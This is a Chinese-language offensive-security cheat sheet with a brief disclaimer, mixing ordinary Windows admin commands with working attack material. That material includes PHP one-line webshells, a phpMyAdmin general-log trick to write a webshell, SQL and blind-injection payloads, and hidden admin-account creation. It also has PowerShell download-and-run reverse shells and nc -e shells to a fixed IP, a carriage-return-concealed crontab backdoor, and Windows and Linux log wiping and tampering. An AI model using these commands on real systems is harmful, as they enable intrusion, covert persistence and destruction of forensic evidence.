目录
免责声明
文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!
windows
php一句话木马
<?php eval(@$_POST['a']);?> <?php eval(@$_GET['a']);?> 其中eval就是执行命令的函数,$_POST['a']就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样就能够让插入了一句话木马的网站执行传递过去的任意PHP命令。 <?php assert(@$_POST['a']); ?> <?php $fun = create_function('',$_POST['a']); $fun(); ?> <?php @call_user_func(assert,$_POST['a']); ?>
日志清理
wevtutil: wevtutil el 列出系统中所有日志名称 wevtutil cl system 清理系统日志 wevtutil cl application 清理应用程序日志 wevtutil cl security 清理安全日志 或直接打开C:\Users\Administrator\Recent并删除所有内容 或在命令行中输入del /f /s /q “%userprofile%\Recent*.*
DOS命令
1. gpedit.msc-----组策略 2. sndrec32-------录音机 3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。 4. explorer-------打开资源管理器 5. logoff---------注销命令 6. shutdown-------60秒倒计时关机命令 7. lusrmgr.msc----本机用户和组 8. services.msc---本地服务设置 9. oobe/msoobe /a----检查XP是否激活 10. notepad--------打开记事本 11. cleanmgr-------垃圾整理 12. net start messenger----开始信使服务 13. compmgmt.msc---计算机管理 14. net stop messenger-----停止信使服务 15. conf-----------启动netmeeting 16. dvdplay--------DVD播放器 17. charmap--------启动字符映射表 18. diskmgmt.msc---磁盘管理实用程序 19. calc-----------启动计算器 20. dfrg.msc-------磁盘碎片整理程序 21. chkdsk.exe-----Chkdsk磁盘检查 22. devmgmt.msc--- 设备管理器 23. regsvr32 /u *.dll----停止dll文件运行 24. drwtsn32------ 系统医生 25. rononce -p----15秒关机 26. dxdiag---------检查DirectX信息 27. regedt32-------注册表编辑器 28. Msconfig.exe---系统配置实用程序 29. rsop.msc-------组策略结果集 30. mem.exe--------显示内存使用情况 31. regedit.exe----注册表 32. winchat--------XP自带局域网聊天 33. progman--------程序管理器 34. winmsd---------系统信息 35. perfmon.msc----计算机性能监测程序 36. winver---------检查Windows版本 37. sfc /scannow-----扫描错误并复原 38. taskmgr-----任务管理器(2000/xp/2003 40. wmimgmt.msc----打开windows管理体系结构(WMI) 41. wupdmgr--------windows更新程序 42. wscript--------windows脚本宿主设置 43. write----------写字板 45. wiaacmgr-------扫描仪和照相机向导 46. winchat--------XP自带局域网聊天 49. mplayer2-------简易widnows media player 50. mspaint--------画图板 51. mstsc----------远程桌面连接 53. magnify--------放大镜实用程序 54. mmc------------打开控制台 55. mobsync--------同步命令 57. iexpress-------木马捆绑工具,系统自带 58. fsmgmt.msc-----共享文件夹管理器 59. utilman--------辅助工具管理器 61. dcomcnfg-------打开系统组件服务 62. ddeshare-------打开DDE共享设置 110. osk------------打开屏幕键盘 111. odbcad32-------ODBC数据源管理器 112. oobe/msoobe /a----检查XP是否激活 68. ntbackup-------系统备份和还原 69. narrator-------屏幕“讲述人” 70. ntmsmgr.msc----移动存储管理器 71. ntmsoprq.msc---移动存储管理员操作请求 72. netstat -an----(TC)命令检查接口 73. syncapp--------创建一个公文包 74. sysedit--------系统配置编辑器 75. sigverif-------文件签名验证程序 76. ciadv.msc------索引服务程序 77. shrpubw--------创建共享文件夹 78. secpol.msc-----本地安全策略 79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 80. services.msc---本地服务设置 81. Sndvol32-------音量控制程序 82. sfc.exe--------系统文件检查器 83. sfc /scannow---windows文件保护 84. ciadv.msc------索引服务程序 85. tourstart------xp简介(安装完成后出现的漫游xp程序) 86. taskmgr--------任务管理器 87. eventvwr-------事件查看器 88. eudcedit-------造字程序 89. compmgmt.msc---计算机管理 90. packager-------对象包装程序 91. perfmon.msc----计算机性能监测程序 92. charmap--------启动字符映射表 93. cliconfg-------SQL SERVER 客户端网络实用程序 94. Clipbrd--------剪贴板查看器 95. conf-----------启动netmeeting 96. certmgr.msc----证书管理实用程序 97. regsvr32 /u *.dll----停止dll文件运行 98. regsvr32 /u zipfldr.dll------取消ZIP支持 99. cmd.exe--------CMD命令提示符
查看用户的SID
whoami /user //查看当前用户的sid wmic useraccount get name,sid //查看系统所有用户的sid
最高权限
Administrator作为默认用户名是默认的最高用户权限。 可以调用系统大部分资源。 属于一个权职控制台权限。 trustedinstaller和system的权限比administrator要高。 trustedinstaller最主要的功能是做系统层级的加密、证书处理等工作的,是一个底层权限。
常见的cmd命令
#系统信息 net user hack$ 123 /add 创建隐藏用户hack,密码为123 net localgroup administrators hack$ /add 将隐藏用户hack提权到管理员 CHCP 65001 修改字体编码为UTF-8 systeminfo 查看系统信息 hostname 查看主机名 SET 查看环境变量 color 改变cmd颜色 cls 清除屏幕 #网络 ping -t -l 65500 ip 死亡之ping ipconfig /release 释放ip ipconfig /renew 重新获得ip ipconfig /flushdns 刷新DNS缓存 route print 打印路由信息 arp -a 查看arp缓存 net view 查看局域网内其他计算机名称 netsh firewall show state 防火墙状态 netsh firewall show config 防火墙规则 #用户 whoami 查看系统当前用户 net user 查看有哪些用户 net user xie 查看用户xie的信息 net localgroup 查看组 net localgroup administrators 查看组administrators的信息 net user hack 123 /add 新建一个用户hack,密码为123 net user hack$ 123 /add 新建一个隐藏hack用户,密码为123 net user hack /del 删除用户hack net localgroup administrators hack /add 将普通用户hack提权到管理员 net user guest /active:yes 激活guest用户 net user guest /active:no 关闭guest用户 net password 密码 更改系统当前登录用户密码 net user guest 密码 更改guest用户密码 #端口进程服务 tasklist 查看进程 tasklist /svc 查看进程,显示进程使用者名称 netstat -ano 查看系统开放端口 netstat -ano|findstr 80 查看80端口对应的PID tasklist | findstr 80 查看80端口对应的进程 taskkill /f /t /im xx.exe 杀死xx.exe进程 taskkill /F -pid 520 杀死pid为520的进程 net start 查看开启了哪些服务 net start telnet 开启telnet服务 net stop telnet 停止 telnet服务 start www.baidu.com 打开网址 #共享 net use 查看连接 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C盘共享 net use \\192.168.10.15\ipc$ /u:"" "" 与192.168.10.15建立ipc空连接 net use \\192.168.10.15 /u:"" "" 与192.168.10.15建立ipc空连接,可以吧ipc$去掉 net use \\192.168.10.15 /u:"administrator" "root" 以administrator身份与192.168.10.15建立ipc连接 net use \\192.168.10.15 /del 删除ipc连接 net use \\192.168.10.15\c$ /u:"administrator" "root" 建立C盘共享 dir \\192.168.10.15\c$ 查看192.168.10.15C盘文件 dir \\192.168.10.15\c$\user 查看192.168.10.15C盘文件下的user目录 dir \\192.168.10.15\c$\user\test.exe 查看192.168.10.15C盘文件下的user目录下的test.exe文件 net use \\192.168.10.15\c$ /del 删除该C盘共享连接 net use k: \\192.168.10.15\c$ /u:"administrator" "root" 将目标C盘映射到本地K盘 net use k: /del 删除该映射 #文件操作 echo hello,word > 1.txt 向1.txt中写入 hello,word echo hello,word >>1.txt 向1.txt中追加 hello,word del 删除一个文件 deltree 删除文件夹和它下面的所有子文件夹还有文件 ren 1.txt 2.txt 将 1.txt 重命名为 2.txt type 1.txt 查看1.txt文件的内容 md 创建一个文件夹 rd 删除一个文件夹 move 1.txt d:/ 将1.txt文件移动到d盘下 type 123.txt 打开123.txt文件 dir c:\ 查看C盘下的文件 dir c:\ /A 查看C盘下的所有文件,包括隐藏文件 dir c:\ /S 查看C盘下和其子文件夹下的文件 dir c:\ /B 只显示C盘下的文件名 shutdown -s -t 60 -c “你的电脑被黑了” -s关机 -r重启 -a取消
反弹shell
chcp 65001 //设置utf-8
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.100.128 -Port 9999" powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.100.128 -p 8888 -e powershell
nc.exe 192.168.100.128 8888 -e powershell
查询域名称:net view /domain 查 询 域 内 计 算 机 : net view /doamin:xx 查 询 域 控 制 器 时 间 : net time /domain 查 询 域 管 理 用 户 : net group "domain admins" /domain 得 到 域 控 制 主 机 名 : net group "domain controllers" /domain 获取域控主机名:net group "domain controllers" /domain
PHPMYadmin
查看数据库版本
select @@version
查看版本得知 数据库大于5.0
查询导出的路径
show variables like '%secure%'
查看日志状态 secure_auth off表示没有开启 保存路径在 @#@*#@.log
show variables like '%general%'
开启日志记录 并更改文件路径
set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/shell.php'; show variables like '%general%'
执行sql语句后 就会把记录保存在shell.php 里
SELECT '<?php @assert($_REQUEST["123"]);?>';
mysql注入语句
爆破所有数据库: select group_concat(schema_name) from information_schema.schemata 获取数据库所有表: select group_concat(table_name) from information_schema.tables where table_schema='mysql' 获取所有列名: select group_concat(column_name) from information_schema.columns where table_name='users' 获取所有用户密码: select group_concat(password) from security.users select group_concat(username) from security.users
盲注 方法一:时间延迟型手工注入 1.爆库长 ?id=1' and if(length(database())=8,sleep(5),1)--+ 明显延迟,数据库长度为8. 2.爆库名 ?id=1' and if(left(database(),1)='s' ,sleep(5),1) --+ ?id=1' and if(left(database(),8)='security' ,sleep(5),1) --+ 3.爆表名 ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(5),1) --+ ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,2),1)='us' ,sleep(5),1) --+ ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,5),1)='users' ,sleep(5),1) --+ 4.爆列名 ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+ 5.爆用户和密码 ?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+ ?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+ 方法二,布尔型手工注入 在布尔型注入中,正确会回显,错误没有回显 1.爆库名 id=1' and length(database())=8--+ ?id=' and left((select database()),1)='s' --+ ?id=' and left((select database()),2)='se' --+ 2.爆表名 ?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+ 3.爆列名 ?id=1'and left((select column_name from information_schema.columns where table_name='users'limit 2,1 ),8)='password' --+ 4.爆用户和密码 ?id=1' and left((select username from users order by id limit 0,1),1)='d' --+ ?id=1' and left((select password from users order by id limit 0,1),1)='d' --+
wmic
wmic qfe list #查看补丁详情 wmic process get caption, executablepath,commandline #查看进程并显示运行进程的命令语句 wmic process where name=“WMIC.exe" call terminate #终止某个进程 wmic os get name,servicepackmajorversion #提取操作系统的servicepack版本 wmic product get name,version #得到安装部分应用的版本 wmic product where name=“name” call uninstall /nointeractive #卸载名字为name的软件 wmic share get /ALL #查看共享情况 wmic nteventlog get path,filename, writeable #得到日志文件的位置
进程管理 wmic process list brief #列出所有进程,Full显示所有、Brief显示摘要、Instance显示实例、Status显示状态 wmic process get name,executablepath #获取所有进程名称以及可执行路径 wmic process where name="jqs.exe" get executablepath #获取指定进程可执行路径 wmic process call create "C:\Program Files\Tencent\QQ\QQ.exe" #创建新进程 wmic process call create "shutdown.exe -r -f -t 60" #根据命令创建进程 wmic process where name="qq.exe" delete #根据进程名称删除进程 wmic process where pid="123" delete #根据PID删除进程
账号管理 WMIC USERACCOUNT where "name='%UserName%'" call rename newUserName #更改当前用户名
账号管理 WMIC USERACCOUNT where "name='%UserName%'" call rename newUserName #更改当前用户名
共享管理 #建立共享 WMIC SHARE CALL Create "","test","3","TestShareName","","c:\test",0 (可使用 WMIC SHARE CALL Create /? 查看create后的参数类型) #删除共享 WMIC SHARE where name="C$" call delete WMIC SHARE where path='c:\test' delete
服务管理 #更改telnet服务启动类型[Auto|Disabled|Manual] wmic SERVICE where name="tlntsvr" set startmode="Auto" #运行telnet服务 wmic SERVICE where name="tlntsvr" call startservice #停止ICS服务 wmic SERVICE where name="ShardAccess" call stopservice #删除test服务 wmic SERVICE where name="test" call delete
linux
crontab创建隐藏后门
(crontab -l;printf "* * * * * nc 192.168.95.128 5555 -e /bin/bash;\rno crontab for `whoami`%100c\n")|crontab -
查看:
cat -A /var/spool/cron/root
linux日志文件
使用vim打开文件执行命令 :set history=0 :!command
针对性删除日志文件: 删除当天日志 sed -i '/当天日期/'d filename
篡改日志文件: 将所有170.170.64.17ip替换为127.0.0.1 sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除脚本: #!/usr/bin/bash echo > /var/log/syslog echo > /var/log/messages echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/xferlog echo > /var/log/secure echo > /var/log/auth.log echo > /var/log/user.log echo > /var/log/wtmp echo > /var/log/lastlog echo &